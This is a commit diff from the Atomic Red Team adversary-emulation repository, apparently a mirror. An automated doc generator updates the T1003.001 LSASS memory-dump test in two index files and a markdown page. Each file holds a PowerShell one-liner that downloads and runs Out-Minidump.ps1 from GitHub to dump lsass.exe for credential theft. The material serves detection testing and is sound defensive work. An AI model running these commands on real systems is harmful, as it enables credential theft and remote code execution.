security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2023-05-31 21:08:41 +00:00
parent 35c539e776
commit cb29aa596f
3 changed files with 9 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+3 -1
View File
@@ -89123,12 +89123,14 @@ credential-access:
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
'
atomics/Indexes/windows-index.yaml
+3 -1
View File
@@ -77382,12 +77382,14 @@ credential-access:
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
'
atomics/T1003.001/T1003.001.md
+3 -1
View File
@@ -420,6 +420,8 @@ The memory of lsass.exe is often dumped for offline credential theft attacks. Th
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
**Supported Platforms:** Windows
@@ -435,7 +437,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump
```
#### Cleanup Commands: